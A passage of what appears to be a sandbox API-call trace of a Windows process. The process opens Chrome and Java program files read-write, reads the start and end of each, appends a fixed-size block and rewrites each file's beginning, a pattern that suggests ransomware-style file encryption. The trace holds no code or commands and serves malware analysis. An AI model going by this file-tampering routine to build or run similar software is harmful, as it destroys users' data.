nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2668898*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.050] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x484f8 [0115.051] WriteFile (in: hFile=0x1cc, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.051] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0115.051] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0115.051] CloseHandle (hObject=0x1cc) returned 1 [0115.051] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fa.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fa.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0115.052] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0115.052] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x72286 [0115.053] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0115.053] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.053] ReleaseMutex (hMutex=0x168) returned 1 [0115.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fa.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0115.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fa.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac84, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fa.pak", lpUsedDefaultChar=0x0) returned 6 [0115.053] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0115.083] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x71286 [0115.083] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.115] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x71286 [0115.115] WriteFile (in: hFile=0x1cc, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.115] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0115.115] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0115.116] CloseHandle (hObject=0x1cc) returned 1 [0115.116] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hu.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hu.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0115.117] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0115.117] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x54a87 [0115.117] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0115.117] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.117] ReleaseMutex (hMutex=0x168) returned 1 [0115.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hu.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0115.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hu.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac84, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hu.pak", lpUsedDefaultChar=0x0) returned 6 [0115.117] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0115.141] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x53a87 [0115.142] ReadFile (in: hFile=0x1cc, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.446] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x53a87 [0115.446] WriteFile (in: hFile=0x1cc, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.447] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0115.447] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0115.447] CloseHandle (hObject=0x1cc) returned 1 [0115.447] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ml.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ml.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0115.448] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0115.448] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xccccc [0115.448] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0115.448] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.448] ReleaseMutex (hMutex=0x168) returned 1 [0115.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ml.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0115.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ml.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac84, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ml.pak", lpUsedDefaultChar=0x0) returned 6 [0115.448] ReadFile (in: hFile=0x1cc, lpBuffer=0x289e978, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0115.463] ReadFile (in: hFile=0x1cc, lpBuffer=0x289e978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.632] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xcbccc [0115.632] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.645] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xcbccc [0115.645] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.647] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0115.647] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0115.647] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.648] CloseHandle (hObject=0x1cc) returned 1 [0115.648] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ro.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ro.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0115.649] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0115.649] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x51b03 [0115.649] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0115.649] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.649] ReleaseMutex (hMutex=0x168) returned 1 [0115.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ro.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0115.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ro.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac84, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ro.pak", lpUsedDefaultChar=0x0) returned 6 [0115.649] ReadFile (in: hFile=0x1cc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0115.657] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x50b03 [0115.657] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.828] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x50b03 [0115.829] WriteFile (in: hFile=0x1cc, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.830] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0115.830] WriteFile (in: hFile=0x1cc, lpBuffer=0x28ae9a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28ae9a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0115.830] CloseHandle (hObject=0x1cc) returned 1 [0115.830] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\te.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\te.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0115.832] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0115.832] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb0b7d [0115.832] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0115.832] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.832] ReleaseMutex (hMutex=0x168) returned 1 [0115.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="te.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0115.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="te.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac84, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="te.pak", lpUsedDefaultChar=0x0) returned 6 [0115.832] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0116.496] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.509] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xafb7d [0116.509] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea9ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.520] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xafb7d [0116.520] WriteFile (in: hFile=0x1cc, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.521] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0116.521] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0116.521] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0116.522] CloseHandle (hObject=0x1cc) returned 1 [0116.522] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\natives_blob.bin" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\natives_blob.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0116.522] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0116.523] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x40323 [0116.523] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0116.523] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.523] ReleaseMutex (hMutex=0x168) returned 1 [0116.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="natives_blob.bin", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="natives_blob.bin", cchWideChar=16, lpMultiByteStr=0x1f88bcc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="natives_blob.bin", lpUsedDefaultChar=0x0) returned 16 [0116.523] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0116.553] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3f323 [0116.553] ReadFile (in: hFile=0x1cc, lpBuffer=0x2667898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.558] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3f323 [0116.559] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.559] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0116.559] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0116.560] CloseHandle (hObject=0x1cc) returned 1 [0116.560] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0116.562] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0116.562] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x665 [0116.562] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0116.562] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.562] ReleaseMutex (hMutex=0x168) returned 1 [0116.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="widevinecdm.dll.sig", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0116.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="widevinecdm.dll.sig", cchWideChar=19, lpMultiByteStr=0x1f88ba4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="widevinecdm.dll.sig", lpUsedDefaultChar=0x0) returned 19 [0116.562] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x665, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x2b1f2bc*=0x665, lpOverlapped=0x0) returned 1 [0116.565] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0116.565] WriteFile (in: hFile=0x1cc, lpBuffer=0x2664868*, nNumberOfBytesToWrite=0xbed, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2664868*, lpNumberOfBytesWritten=0x2b1f2d0*=0xbed, lpOverlapped=0x0) returned 1 [0116.566] CloseHandle (hObject=0x1cc) returned 1 [0116.566] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\java.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0116.567] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0116.567] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2a9a8 [0116.568] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0116.568] WaitForSingleObject 